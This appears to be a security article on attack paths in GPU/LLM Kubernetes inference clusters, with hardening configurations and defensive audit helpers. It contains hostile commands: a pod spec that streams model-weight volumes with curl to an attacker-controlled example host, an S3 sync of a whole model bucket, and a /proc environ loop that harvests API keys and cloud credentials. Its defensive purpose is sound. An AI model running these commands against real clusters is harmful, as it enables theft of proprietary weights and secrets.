Compromising an AI Inference Cluster: Attack Paths Unique to GPU and LLM Kubernetes Deployments

The Problem

An AI inference cluster looks like a Kubernetes cluster. It has nodes, namespaces, PersistentVolumes, and RBAC policies. But deploying LLM inference workloads creates attack surface that does not exist in a cluster running stateless microservices: a DaemonSet that runs on every GPU node with host device access, multi-gigabyte model weight files stored on ReadWriteMany network volumes, cloud IAM roles scoped to an entire model registry, and NodeAffinity policies that concentrate every interesting workload on a handful of expensive nodes. An attacker who understands this topology has a materially different target than the standard Kubernetes threat model accounts for.

This article maps five attack surfaces specific to LLM inference infrastructure. Each one represents a class of misconfiguration that is common in practice — not because operators are careless, but because the default configurations recommended in GPU device plugin documentation, cloud model registry setup guides, and vLLM deployment tutorials optimise for getting the model serving as fast as possible. Security review happens after the cluster is already running production traffic.

The attack chain that follows is realistic. Each step uses techniques that work against real deployments.

Attack Surface 1: NVIDIA GPU Device Plugin DaemonSet

The nvidia-device-plugin DaemonSet is the mechanism by which Kubernetes learns that GPU nodes have GPU resources available for scheduling. It advertises GPU capacity to the kubelet via the device plugin API, allowing pods to request nvidia.com/gpu: 1 resources. To do this, it needs access to GPU device files and the NVIDIA persistence daemon socket.

The GPU Operator-managed deployment runs the device plugin with more privilege than device registration strictly requires. NVIDIA's standalone k8s-device-plugin manifest ships a tighter securityContext, so check what your chart version actually renders:

# from the nvidia/gpu-operator helm chart defaults, abridged for brevity
containers:
- name: nvidia-device-plugin-ctr
  image: nvcr.io/nvidia/k8s-device-plugin:v0.16.0
  securityContext:
    privileged: true   # full host privileges; not required for device registration
  volumeMounts:
  - name: device-plugin
    mountPath: /var/lib/kubelet/device-plugins
  - name: dev
    mountPath: /dev    # all host devices, not just GPU devices

Running privileged on a DaemonSet that covers every GPU node means: any vulnerability in the device plugin process, in its container image, or in the gRPC interface it exposes to the kubelet gives an attacker access to the full host device namespace. From inside a privileged container with /dev mounted from the host, accessing GPU device files is direct:

# From inside a compromised nvidia-device-plugin pod:
ls /dev/nvidia*
# /dev/nvidia0  /dev/nvidia1  /dev/nvidiactl  /dev/nvidia-uvm  /dev/nvidia-uvm-tools

nvidia-smi
# Fri May  9 10:22:18 2026
# +-----------------------------------------------------------------------------+
# | NVIDIA-SMI 550.54.15  Driver Version: 550.54.15  CUDA Version: 12.4        |
# +-----------------------------------------------------------------------------+
# | GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
# | Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
# |=============================================================================|
# |   0  NVIDIA A100-SXM4-40GB Off| 00000000:00:04.0 Off|                    0 |
# |  N/A   37C    P0   55W / 400W |  38204MiB / 40960MiB |     79%      Default |

The GPU memory occupied (38204MiB / 40960MiB) represents a live inference workload. Each CUDA context gets its own GPU virtual address space, but without MIG partitioning every context on a physical GPU shares the same device memory, and the device plugin's allocation model only separates pods by whole GPU. An attacker with direct access to the device files and host-level privilege is in a far stronger position than a tenant confined to its own context: they can create contexts on the same device, probe for residual data in memory that was freed without being cleared, and attack the driver interfaces that enforce the separation. Treat model weights and in-flight inference buffers on that GPU as exposed. Conceptually this is the GPU counterpart of reading /proc/PID/mem for a process on a host you already control.

The persistence daemon socket at /run/nvidia-persistenced/socket allows controlling GPU persistence mode — a secondary risk that enables denial of service by toggling GPU state.
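
The privilege and mount pattern described above can be checked mechanically. The following is a minimal Python sketch, not part of any NVIDIA or Kubernetes tooling: find_risky_settings and BROAD_HOST_PATHS are hypothetical names, and the input is assumed to be the pod template spec (for example .spec.template.spec from kubectl get daemonset -o json) already parsed into a dict.

```python
# Hypothetical audit helper: flags privileged containers and broad hostPath
# mounts in a pod template spec parsed from `kubectl get ... -o json`.
BROAD_HOST_PATHS = {"/", "/dev", "/proc", "/sys", "/run", "/var/run"}  # assumed list


def find_risky_settings(pod_spec):
    """Return human-readable findings for one pod (template) spec."""
    findings = []
    # Map volume name -> normalised host path, for hostPath volumes only.
    host_paths = {
        v["name"]: (v["hostPath"]["path"].rstrip("/") or "/")
        for v in pod_spec.get("volumes", [])
        if "hostPath" in v
    }
    containers = pod_spec.get("containers", []) + pod_spec.get("initContainers", [])
    for c in containers:
        security_context = c.get("securityContext") or {}
        if security_context.get("privileged") is True:
            findings.append(f"{c['name']}: privileged")
        for mount in c.get("volumeMounts", []):
            path = host_paths.get(mount["name"])
            if path in BROAD_HOST_PATHS:
                findings.append(f"{c['name']}: mounts host {path}")
    return findings
```

Run against the excerpt shown earlier (with its volumes filled in as hostPath entries), this reports both the privileged flag and the /dev mount. An empty result only means these two patterns are absent; it does not prove the pod is safe.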

Attack Surface 2: Model Weight PersistentVolumes

A Llama 3 70B deployment requires approximately 140 GB of disk for bfloat16 weights stored as .safetensors shards. Serving this model across multiple replicas for throughput means multiple pods need simultaneous read access to the same files. The natural Kubernetes solution is a ReadWriteMany PersistentVolume backed by NFS, EFS, or CephFS. This design solves the operational problem and introduces a new one.

In a namespace where an attacker can create pods — which requires only the create pods permission in that namespace, not cluster-admin — they can mount any PVC that exists in that namespace simply by naming it in a PodSpec:

kubectl run weight-exfil \
  --image=alpine \
  --restart=Never \
  --overrides='{
    "spec": {
      "nodeSelector": {"nvidia.com/gpu.present": "true"},
      "volumes": [{
        "name": "model",
        "persistentVolumeClaim": {"claimName": "llama3-70b-weights"}
      }],
      "containers": [{
        "name": "exfil",
        "image": "alpine",
        "command": ["sh", "-c",
          "apk add curl && tar czf - /model | curl -T - https://attacker-controlled.example.com/upload"
        ],
        "volumeMounts": [{
          "name": "model",
          "mountPath": "/model"
        }]
      }]
    }
  }'

This pod starts, mounts the model weight volume, streams 140 GB of proprietary weights to attacker-controlled infrastructure, and exits. The Kubernetes admission control path for pods does not, by default, restrict which pods can mount which PVCs. The API server validates that the PVC exists and is in the correct namespace. Nothing in the standard admission chain asks whether this pod has a legitimate reason to access model weights.

The same technique applies to ReadWriteOnce volumes if the attacker’s pod can be scheduled to the same node as the existing consumer pod — which NodeAffinity requirements make predictable, since all inference pods land on GPU nodes.

A related variant targets the PV directly at the storage layer. NFS exports backing model weight volumes are frequently configured with broad client CIDR ranges to simplify pod scheduling across node groups. Any pod whose node can reach the NFS server IP can attempt to read the export directly. A kernel-level mount needs CAP_SYS_ADMIN inside the container; a pod without it can reach the same export with a userspace NFS client:

# From a pod with CAP_SYS_ADMIN and network access to the NFS server:
mount -t nfs nfs-server.internal:/exports/model-weights /mnt/weights
ls /mnt/weights/
# llama-3-70b-instruct-f16-00001-of-00008.safetensors
# llama-3-70b-instruct-f16-00002-of-00008.safetensors
# ...

No Kubernetes API call. No admission webhook. Just a network-layer mount.
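
For the API-level path (a pod naming the PVC in its spec), a defender can at least enumerate who is mounting the weights right now. This is a small sketch under assumptions: pods_mounting_pvc is a hypothetical helper, and its input is the parsed output of kubectl get pods -A -o json. It cannot see the network-layer NFS mount described above, which never touches the API server.

```python
from fnmatch import fnmatch


def pods_mounting_pvc(pod_list, claim_pattern):
    """Return (namespace, pod, claimName) for each pod volume whose PVC name
    matches the shell-style pattern, e.g. "*weights*"."""
    hits = []
    for pod in pod_list.get("items", []):
        meta = pod.get("metadata", {})
        for volume in pod.get("spec", {}).get("volumes", []):
            claim = (volume.get("persistentVolumeClaim") or {}).get("claimName")
            if claim and fnmatch(claim, claim_pattern):
                hits.append((meta.get("namespace", ""), meta.get("name", ""), claim))
    return hits
```

Comparing the result against the list of expected inference pods gives a quick signal: any extra entry is a pod that mounted the weights without being part of the serving deployment.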

Attack Surface 3: Cloud IAM and Model Registry Access

Inference pods need to download model weights at startup, either from a model registry bucket on initial deployment or on scale-out when new replicas start before the weight volume is pre-populated. The standard pattern is IRSA on AWS (IAM Roles for Service Accounts) or Workload Identity on GCP, attaching a cloud IAM role to the Kubernetes service account that inference pods run under.

The common misconfiguration is scoping this role to the bucket rather than to the specific prefix corresponding to a single model. A role policy that reads:

{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": ["s3:GetObject", "s3:ListBucket"],
    "Resource": [
      "arn:aws:s3:::company-models",
      "arn:aws:s3:::company-models/*"
    ]
  }]
}

grants the inference pod for the publicly available Llama 3 70B model access to every proprietary fine-tuned variant the organisation has ever uploaded to that bucket. Fine-tuned models represent months of human feedback data collection, labelling costs, and captured intellectual property. From a compromised inference pod, or from any pod running under the same service account:

# From inside a pod running under the inference service account:
aws s3 ls s3://company-models/
#                            PRE llama3-70b-base/
#                            PRE llama3-70b-finance-finetuned/
#                            PRE llama3-70b-medical-finetuned/
#                            PRE gpt4-class-proprietary-distillation/

aws s3 sync s3://company-models/ /tmp/stolen/
# download: s3://company-models/llama3-70b-finance-finetuned/...

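IRSA does not hand the pod a long-lived secret. It projects a service account token into the pod at /var/run/secrets/eks.amazonaws.com/serviceaccount/token, and the AWS SDK exchanges that token for short-lived STS credentials through AssumeRoleWithWebIdentity. The kubelet refreshes the projected token automatically, so an attacker with shell access to the pod can keep minting fresh credentials for as long as they hold their foothold.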

On GCP the equivalent is Workload Identity binding a Kubernetes service account to a GCP service account with roles/storage.objectViewer on the model bucket. The token is available at the GCP metadata endpoint (http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token) and suffers from the same overly broad scope pattern.
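
The bucket-wide pattern is easy to detect in a policy document. The sketch below is illustrative only: bucket_wide_statements is a hypothetical helper that inspects a parsed IAM policy dict and flags Allow statements pairing an object-read action with a resource of the form arn:aws:s3:::bucket/*. It checks a short, assumed list of action spellings and ignores Condition blocks, NotResource, and NotAction, so it is a first-pass lint rather than a policy evaluator.

```python
def _as_list(value):
    """IAM allows a single string/dict where a list is expected; normalise."""
    if value is None:
        return []
    return [value] if isinstance(value, (str, dict)) else list(value)


def bucket_wide_statements(policy):
    """Return Allow statements that grant object reads on every key in a bucket."""
    flagged = []
    for statement in _as_list(policy.get("Statement")):
        if statement.get("Effect") != "Allow":
            continue
        actions = _as_list(statement.get("Action"))
        resources = _as_list(statement.get("Resource"))
        reads_objects = any(a in ("s3:GetObject", "s3:Get*", "s3:*", "*") for a in actions)
        # "arn:aws:s3:::bucket/*" has exactly one slash: no key prefix before the wildcard.
        whole_bucket = any(
            r == "*" or (r.startswith("arn:aws:s3:::") and r.endswith("/*") and r.count("/") == 1)
            for r in resources
        )
        if reads_objects and whole_bucket:
            flagged.append(statement)
    return flagged
```

Applied to the policy shown above, the single statement is flagged; a statement whose resource ends in a model-specific prefix followed by /* is not.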

Attack Surface 4: Inference API as Exfiltration Proxy

vLLM, Triton Inference Server, and Text Generation Inference all expose HTTP APIs that accept arbitrary text. Internal inference clusters typically do not apply API key authentication to the inference server itself — authentication is handled by a gateway or application layer upstream. The inference server accepts any HTTP request that reaches its port.

A compromised service sitting between the user-facing API and the inference backend — a compromised gateway pod, a compromised sidecar, or a pod that has established a connection through permissive NetworkPolicy — can perform two distinct attacks without any special permissions.

The first is passive logging. Every user prompt and every model response flows through the inference API as plaintext HTTP. A man-in-the-path attacker logging all inference traffic captures the full PII surface of everyone who has interacted with the model: medical queries, financial data, confidential business context passed in system prompts, authentication credentials that users paste into chat interfaces.

The second is model extraction via unrestricted query volume. External model APIs enforce rate limits and cost barriers that make systematic model extraction expensive. Internal inference servers typically have neither. An attacker with access to the inference endpoint can issue hundreds of thousands of queries, systematically probing the model with inputs designed to reconstruct its behaviour and, for fine-tuned models, the training signal embedded in its weights. The inference server's own logs are a weak audit trail: whether vLLM or TGI records individual requests depends on version and flags, and those logs are rarely shipped anywhere an analyst will look.
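
Query volume is the one signal extraction cannot avoid producing, so even a crude per-client counter at the gateway helps. The following is a minimal sliding-window sketch; QueryRateMonitor, its parameters, and the idea of keying on a client identifier are assumptions for illustration, not a feature of vLLM, TGI, or Triton. Timestamps are passed in explicitly so the logic can be exercised without a clock.

```python
from collections import defaultdict, deque


class QueryRateMonitor:
    """Flags clients that exceed max_queries within a sliding time window."""

    def __init__(self, max_queries, window_seconds):
        self.max_queries = max_queries
        self.window = window_seconds
        self._seen = defaultdict(deque)  # client id -> timestamps inside the window

    def record(self, client, timestamp):
        """Record one query; return True if the client is now over the limit."""
        timestamps = self._seen[client]
        timestamps.append(timestamp)
        # Evict entries that have fallen out of the window.
        while timestamps and timestamps[0] <= timestamp - self.window:
            timestamps.popleft()
        return len(timestamps) > self.max_queries
```

A gateway would call record(client_id, time.time()) per request and alert or throttle when it returns True. The threshold has to be tuned against legitimate batch consumers, which can look very similar to an extraction run.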

Attack Surface 5: GPU Node Concentration

A standard Kubernetes cluster distributes workloads across many heterogeneous nodes. An AI inference cluster concentrates every sensitive workload on a small number of expensive GPU nodes due to NodeAffinity and resource requirements. A cluster with 200 nodes might have 8 GPU nodes. All inference pods run on those 8 nodes. All GPU device plugin pods run on those 8 nodes. All model weight volume mount activity happens on those 8 nodes.

Compromising a single GPU node (through a container escape, a privileged pod deployment, or a vulnerability in node-level software) gives access to the environment of every pod running on that node. From the host PID namespace, /proc exposes the environment of every other process:

# From the host PID namespace on a GPU node: a node shell after a container
# escape, or a pod running with hostPID: true and root or CAP_SYS_PTRACE.
for envfile in /proc/[0-9]*/environ; do
  tr '\0' '\n' < "$envfile" | grep -E \
    "OPENAI_API_KEY|ANTHROPIC_API_KEY|HF_TOKEN|AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY|HUGGING_FACE_HUB_TOKEN|REPLICATE_API"
done 2>/dev/null
# HF_TOKEN=hf_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
# AWS_ACCESS_KEY_ID=ASIAXXXXXXXXXXXXXXXX
# AWS_SECRET_ACCESS_KEY=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
# OPENAI_API_KEY=sk-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

This works because /proc/PID/environ is readable by root (or by a process running as the same user, subject to the kernel's ptrace access checks) for every process visible in the caller's PID namespace. A normal pod has its own PID namespace and sees only its own processes, because hostPID defaults to false. That isolation disappears once the attacker reaches the host PID namespace: containers on a node share the host kernel, so a pod with hostPID: true, a privileged pod, or a container escape exposes the /proc entries of every container on the node.

The concentration effect means a GPU node compromise is qualitatively different from compromising a node in a standard cluster. On a standard cluster, a node compromise gives you the workloads of that node — a fraction of the fleet. On a GPU cluster, a GPU node compromise gives you a large fraction of all inference workloads, all model weight access, and all the credentials those workloads hold.
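
The concentration effect can be put into numbers from a pod-to-node mapping. This is a toy calculation, with node_blast_radius as a hypothetical helper and the pod and node names invented for the example: it returns, for each node, the fraction of the listed pods that a compromise of that node would expose.

```python
from collections import Counter


def node_blast_radius(pod_to_node):
    """Map node name -> fraction of the listed pods running on that node."""
    total = len(pod_to_node)
    if total == 0:
        return {}
    counts = Counter(pod_to_node.values())
    return {node: count / total for node, count in counts.items()}


# Illustrative layout (assumed): 24 inference pods spread evenly over 8 GPU nodes.
inference_pods = {f"vllm-{i}": f"gpu-{i % 8}" for i in range(24)}
radius = node_blast_radius(inference_pods)
```

With this assumed layout every GPU node carries 3 of 24 inference pods, so one node compromise exposes 12.5% of the inference fleet. Spread evenly over the 200 nodes of the example cluster, the same workloads would expose about 0.5% per node.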

Full Compromise Chain

The following chain is not theoretical. Each step uses techniques documented in real post-incident analysis:

1. Initial access via model serving API. A remote code execution vulnerability in the vLLM HTTP server (or a deserialization bug in Triton) gives shell access in the inference pod. vLLM has had publicly disclosed remote code execution vulnerabilities, including unsafe deserialization bugs. Alternatively, the inference namespace allows arbitrary pod creation and an attacker with stolen CI credentials creates a pod directly.
2. Credential enumeration from pod environment. The inference pod environment contains HF_TOKEN, AWS_ACCESS_KEY_ID, and the mounted IRSA web identity token at /var/run/secrets/eks.amazonaws.com/serviceaccount/token. The IRSA token is exchanged through sts:AssumeRoleWithWebIdentity for an STS credential with s3:GetObject on company-models/*.
3. Model exfiltration from S3. Using the STS credential, all model variants in s3://company-models/ are enumerated and synced to attacker-controlled object storage. 300 GB of fine-tuned model weights is exfiltrated over the pod’s outbound internet connection, which is unrestricted because inference pods need to reach the model registry.
4. PVC pivot via pod creation. The stolen CI credentials can create pods in the inference namespace. A pod mounting llama3-70b-weights (ReadWriteMany NFS) is created and streams the on-disk weights to attacker infrastructure as a redundant exfiltration path.
5. GPU node pivot via device plugin. The inference pod has node-level socket access. The device plugin DaemonSet runs privileged. A vulnerability in the device plugin (or simple exploitation of the broad /dev mount) provides access to the host. From the host, all pods running on the GPU node are accessible via their /proc entries and network namespaces.
6. Lateral movement to control plane. The node’s kubelet credential (/var/lib/kubelet/pki/kubelet-client-current.pem) allows authenticated API server requests scoped to the node. With the Node authorizer and NodeRestriction enabled, that scope still includes the Secrets and ConfigMaps referenced by pods scheduled to the node, whatever their namespace. Weaker configurations may also allow reading other Secrets, abusing certificate signing requests, or reaching the kubelet API on other nodes.

Total time from initial inference pod shell to complete model exfiltration: under 30 minutes, assuming the IAM policy misconfiguration is present. Detection surface without specific Falco rules: near zero. The Kubernetes audit log shows a pod creation and some S3 API calls. Nothing raises an alert in a default cluster.

Threat Model

Compromised nvidia-device-plugin pod → privileged host device access → GPU memory readable for all workloads on node → model weights and in-flight inference data exposed
Pod with create pods RBAC permission in inference namespace → mounts model weight PVC → 100-400 GB proprietary model exfiltrated without any authentication beyond Kubernetes namespace membership
IRSA/Workload Identity with bucket-level scope → compromised inference pod exchanges STS token → all models in registry downloaded, including proprietary fine-tuned variants
Compromised inference API proxy → all user queries and responses logged in plaintext → full PII exposure for all model users
GPU node compromise via any vector → /proc enumeration of all pods on node → all API keys, cloud credentials, and HuggingFace tokens in pod environments captured
Unrestricted inference server network access → systematic model extraction queries → model behaviour reconstructed without needing weight access

Hardening Configuration

1. Drop Privileges from the GPU Device Plugin

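The nvidia-device-plugin does not require privileged: true to register devices with the kubelet. It requires access to specific device files and the device plugin socket. Treat the manifest below as a starting point rather than a drop-in: depending on the container runtime, a hostPath mount of a device node may not be enough for an unprivileged container to open it, and NVIDIA's standalone manifest relies on the NVIDIA container runtime to inject the devices instead. Validate on a staging GPU node, then run it with the minimum capabilities: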

apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: nvidia-device-plugin
  namespace: kube-system
spec:
  selector:
    matchLabels:
      app: nvidia-device-plugin
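  template:
    metadata:
      labels:
        app: nvidia-device-plugin   # must match spec.selector or the DaemonSet is rejected
    spec:
      priorityClassName: system-node-critical
      containers:
      - name: nvidia-device-plugin-ctr
        # Pin by digest: replace <digest> with the value you verified for this tag
        image: nvcr.io/nvidia/k8s-device-plugin:v0.16.0@sha256:<digest>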
        securityContext:
          privileged: false
          allowPrivilegeEscalation: false
          readOnlyRootFilesystem: true
          capabilities:
            drop: ["ALL"]
        volumeMounts:
        - name: device-plugin
          mountPath: /var/lib/kubelet/device-plugins
        - name: dev-nvidia
          mountPath: /dev/nvidia0      # specific GPU, not entire /dev; repeat per GPU on multi-GPU nodes
          readOnly: false
        - name: dev-nvidiactl
          mountPath: /dev/nvidiactl
          readOnly: false
      volumes:
      - name: device-plugin
        hostPath:
          path: /var/lib/kubelet/device-plugins
      - name: dev-nvidia
        hostPath:
          path: /dev/nvidia0
          type: CharDevice
      - name: dev-nvidiactl
        hostPath:
          path: /dev/nvidiactl
          type: CharDevice

If the GPU operator Helm chart forces privileged: true, file an issue upstream and enforce the constraint independently with Pod Security Admission, Kyverno, or a validating admission webhook (PodSecurityPolicy was removed in Kubernetes 1.25). Operators routinely accept the default because “it worked with privileged” during initial deployment and the risk is not visible.

Verify the current privilege level in your cluster:

kubectl get daemonset nvidia-device-plugin -n kube-system \
  -o jsonpath='{.spec.template.spec.containers[*].securityContext.privileged}'
# Should output empty or false — if it outputs "true", you are running privileged

2. Restrict Model Weight PVC Mounts with Kyverno

Kubernetes RBAC cannot restrict which pods mount which PVCs; that decision has to be made at admission time, and Kyverno is one way to do it. The following ClusterPolicy denies pod creation if the pod mounts a model weight PVC but does not carry the role: inference label:

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: restrict-model-pvc-mounts
  annotations:
    policies.kyverno.io/title: Restrict Model Weight PVC Mounts
    policies.kyverno.io/description: >
      Model weight PVCs may only be mounted by pods explicitly labelled
      as inference workloads. Prevents unauthorised exfiltration of
      proprietary model weights.
spec:
  validationFailureAction: Enforce
  background: false
  rules:
  - name: only-inference-pods-mount-model-weights
    match:
      any:
      - resources:
          kinds: [Pod]
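    preconditions:
      all:
      # Count PVC volumes whose claim name contains a model-weight marker.
      # contains() on a string is a substring test; on an array it only matches whole elements.
      - key: "{{ length(request.object.spec.volumes[?persistentVolumeClaim && (contains(persistentVolumeClaim.claimName, 'weights') || contains(persistentVolumeClaim.claimName, 'llama'))] || `[]`) }}"
        operator: GreaterThan
        value: 0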
    validate:
      message: >
        Model weight PVCs may only be mounted by pods with label role=inference.
        This pod is mounting a model weight PVC without the required label.
      deny:
        conditions:
          any:
          - key: "{{ request.object.metadata.labels.role || '' }}"
            operator: NotEquals
            value: inference

What this produces when a non-inference pod attempts to mount model weights:

Error from server: admission webhook "validate.kyverno.svc" denied the request:
policy Pod/ai-inference/weight-exfil for resource violation:
restrict-model-pvc-mounts/only-inference-pods-mount-model-weights:
Model weight PVCs may only be mounted by pods with label role=inference.
This pod is mounting a model weight PVC without the required label.

The label requirement is not sufficient as a sole control: anyone who can create pods can also set labels. RBAC cannot filter on labels, so pair this policy with tight RBAC on the create pods verb in the inference namespace and a second admission rule that only lets approved identities (for example, the deployment pipeline's service account) create pods carrying role: inference.
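
The intended decision logic is simple enough to mirror in a few lines, which is useful for unit-testing expectations before touching a live cluster. This is a Python re-statement of the rule's intent, not Kyverno code: admission_decision and WEIGHT_MARKERS are hypothetical names, and the markers assume the naming convention used in this article.

```python
WEIGHT_MARKERS = ("weights", "llama")  # assumed PVC naming convention


def admission_decision(pod):
    """Return (allowed, reason) for a pod manifest parsed into a dict."""
    volumes = pod.get("spec", {}).get("volumes") or []
    claims = [
        v["persistentVolumeClaim"]["claimName"]
        for v in volumes
        if v.get("persistentVolumeClaim")
    ]
    # Substring match on each claim name, mirroring the policy's precondition.
    weight_claims = [c for c in claims if any(marker in c for marker in WEIGHT_MARKERS)]
    if not weight_claims:
        return True, "no model weight PVC mounted"
    role = (pod.get("metadata", {}).get("labels") or {}).get("role", "")
    if role != "inference":
        return False, f"{weight_claims[0]} requires label role=inference"
    return True, "labelled inference pod"
```

Feeding it the weight-exfil pod from Attack Surface 2 yields a denial, while the same pod with role: inference passes, which is exactly why the label alone is not a sufficient control.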

3. Scope Cloud IAM Roles Per Model

Each model deployment gets its own IAM role, scoped to the exact S3 prefix that model uses. A Llama 3 70B inference deployment should not be able to access the finance fine-tune.

AWS IAM policy for a single-model inference role:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "ReadSpecificModelWeights",
      "Effect": "Allow",
      "Action": ["s3:GetObject"],
      "Resource": "arn:aws:s3:::company-models/llama3-70b-instruct/*"
    },
    {
      "Sid": "ListSpecificModelPrefix",
      "Effect": "Allow",
      "Action": ["s3:ListBucket"],
      "Resource": "arn:aws:s3:::company-models",
      "Condition": {
        "StringLike": {
          "s3:prefix": ["llama3-70b-instruct/*"]
        }
      }
    }
  ]
}

The corresponding IRSA annotation on the Kubernetes ServiceAccount:

apiVersion: v1
kind: ServiceAccount
metadata:
  name: llama3-70b-inference
  namespace: ai-inference
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::123456789012:role/llama3-70b-inference-role
    eks.amazonaws.com/token-expiration: "3600"  # 1-hour token rotation

If a pod running under llama3-70b-inference service account attempts to access the finance fine-tune:

aws s3 ls s3://company-models/llama3-70b-finance-finetuned/
# An error occurred (AccessDenied) when calling the ListObjectsV2 operation:
# Access Denied

Maintaining separate roles per model is operationally heavier than a single role. The correct abstraction is Terraform modules that generate a role per model deployment, parameterised on the model name and S3 prefix. The operational cost is one additional IAM role per model — the security value is that a compromised inference pod for model A cannot access model B.
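
The parameterisation itself is small. The sketch below uses Python rather than Terraform purely to show the shape of the template: build_model_policy is a hypothetical helper that produces the same two-statement policy as above for any bucket and model prefix, and refuses empty or wildcard prefixes so that a typo cannot silently widen the scope.

```python
def build_model_policy(bucket, model_prefix):
    """Build a read-only IAM policy document scoped to one model prefix."""
    prefix = model_prefix.strip("/")
    if not prefix or "*" in prefix or "?" in prefix:
        raise ValueError("model_prefix must be a concrete, non-empty prefix")
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "ReadSpecificModelWeights",
                "Effect": "Allow",
                "Action": ["s3:GetObject"],
                "Resource": f"arn:aws:s3:::{bucket}/{prefix}/*",
            },
            {
                "Sid": "ListSpecificModelPrefix",
                "Effect": "Allow",
                "Action": ["s3:ListBucket"],
                "Resource": f"arn:aws:s3:::{bucket}",
                "Condition": {"StringLike": {"s3:prefix": [f"{prefix}/*"]}},
            },
        ],
    }
```

Calling build_model_policy("company-models", "llama3-70b-instruct") and serialising the result with json.dumps reproduces the policy shown earlier; generating one document per deployment keeps the per-model cost to a single function call.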

4. Enforce NetworkPolicy Isolation on the Inference Namespace

Inference pods do not need to initiate connections to other pods in the cluster. They receive requests (handled by ingress), push metrics to Prometheus, and at startup download model weights from S3. Everything else is lateral movement surface.

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: inference-pod-egress-isolation
  namespace: ai-inference
spec:
  podSelector:
    matchLabels:
      role: inference
  policyTypes:
  - Egress
  egress:
  # Model registry: S3 regional endpoint or VPC endpoint
  - to:
    - ipBlock:
        cidr: 10.0.0.0/8  # placeholder: narrow to the S3 VPC endpoint CIDR; a /8 usually covers pod and node IPs too
    ports:
    - port: 443
      protocol: TCP
  # Metrics push to Prometheus (namespaceSelector and podSelector in ONE peer = AND)
  - to:
    - namespaceSelector:
        matchLabels:
          kubernetes.io/metadata.name: monitoring
      podSelector:
        matchLabels:
          app: prometheus
    ports:
    - port: 9090
      protocol: TCP
  # DNS resolution (again a single combined peer, not two separate ones)
  - to:
    - namespaceSelector:
        matchLabels:
          kubernetes.io/metadata.name: kube-system
      podSelector:
        matchLabels:
          k8s-app: kube-dns
    ports:
    - port: 53
      protocol: UDP
    - port: 53
      protocol: TCP
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: inference-pod-ingress-isolation
  namespace: ai-inference
spec:
  podSelector:
    matchLabels:
      role: inference
  policyTypes:
  - Ingress
  ingress:
  # Only accept requests from the inference gateway
  - from:
    - podSelector:
        matchLabels:
          role: inference-gateway
    ports:
    - port: 8000  # vLLM default port
      protocol: TCP

This policy blocks inference pods from reaching the Kubernetes API server, other pods in the namespace, and arbitrary external destinations. A compromised inference pod that attempts to reach 169.254.169.254 (IMDS) for lateral credential access gets no response. A pod that attempts to reach other pods in the cluster gets no response.

Verify the policy is enforced by attempting a connection from an inference pod to the API server:

kubectl exec -it <inference-pod> -- \
  curl -k --connect-timeout 30 https://kubernetes.default.svc/api/v1/namespaces -o /dev/null -w "%{http_code}"
# curl: (28) Connection timed out after 30001 milliseconds
# 000
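
One pitfall worth checking in any policy of this shape: inside a to or from list, a namespaceSelector and a podSelector written as two separate list items are ORed, while the same two selectors inside a single item are ANDed. The separate form allows every pod in the selected namespace plus every matching pod in the policy's own namespace. The sketch below flags the separate form; split_selector_peers is a hypothetical helper operating on a NetworkPolicy parsed into a dict.

```python
def split_selector_peers(policy):
    """Flag rules whose peers list holds a namespaceSelector-only item and a
    podSelector-only item side by side (OR semantics, often unintended)."""
    warnings = []
    spec = policy.get("spec", {})
    for direction, peer_key in (("egress", "to"), ("ingress", "from")):
        for index, rule in enumerate(spec.get(direction) or []):
            peers = rule.get(peer_key) or []
            ns_only = [p for p in peers if "namespaceSelector" in p and "podSelector" not in p]
            pod_only = [p for p in peers if "podSelector" in p and "namespaceSelector" not in p]
            if ns_only and pod_only:
                warnings.append(
                    f"{direction}[{index}]: namespaceSelector and podSelector are separate peers (OR)"
                )
    return warnings
```

A warning is not always a bug, since separate peers are occasionally intended, but for rules meant to reach one workload in one namespace the combined form is almost always what was meant.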

5. Add Authentication to Internal Inference APIs

Even inference APIs that are “only accessible internally” should require authentication. Internal accessibility is not an access control — it means “any compromised pod in the cluster can query this without authentication.”

vLLM supports API key authentication via the --api-key flag. Set it:

# In the vLLM Deployment spec:
containers:
- name: vllm
  image: vllm/vllm-openai:v0.4.2
  args:
  - "--model"
  - "/model/llama3-70b-instruct"
  - "--api-key"
  - "$(VLLM_API_KEY)"
  env:
  - name: VLLM_API_KEY
    valueFrom:
      secretKeyRef:
        name: vllm-api-credentials
        key: api-key

Requests without a valid Authorization: Bearer <key> header receive a 401. An attacker who has reached the vLLM port but does not have the API key cannot issue queries. This does not prevent a fully compromised pod from reading the key from its own environment, but it eliminates query access from adjacent pods that have only network reachability.

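For TGI (Text Generation Inference) and Triton, check whether your release offers a built-in API key or restricted-endpoint option; where it does not, put an authenticating reverse proxy or sidecar in front of the server. TGI's --master-port flag configures communication between model shards and has nothing to do with authentication.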
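
Where the server has no built-in check, the proxy or sidecar in front of it needs only a few lines of logic. This is a minimal sketch of that check, assuming a single shared key; is_authorized is a hypothetical helper, not an API of vLLM, TGI, or Triton. It uses hmac.compare_digest so that the comparison time does not leak how many leading characters of a guess were correct.

```python
import hmac
from typing import Optional


def is_authorized(authorization_header: Optional[str], expected_key: str) -> bool:
    """Validate an 'Authorization: Bearer <key>' header against the expected key."""
    if not authorization_header:
        return False
    scheme, _, presented = authorization_header.partition(" ")
    presented = presented.strip()
    if scheme.lower() != "bearer" or not presented:
        return False
    # Constant-time comparison on bytes.
    return hmac.compare_digest(presented.encode("utf-8"), expected_key.encode("utf-8"))
```

The proxy returns 401 whenever this function returns False and forwards the request otherwise. The expected key should come from a mounted Secret, as in the vLLM example, and never from the image or a ConfigMap.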

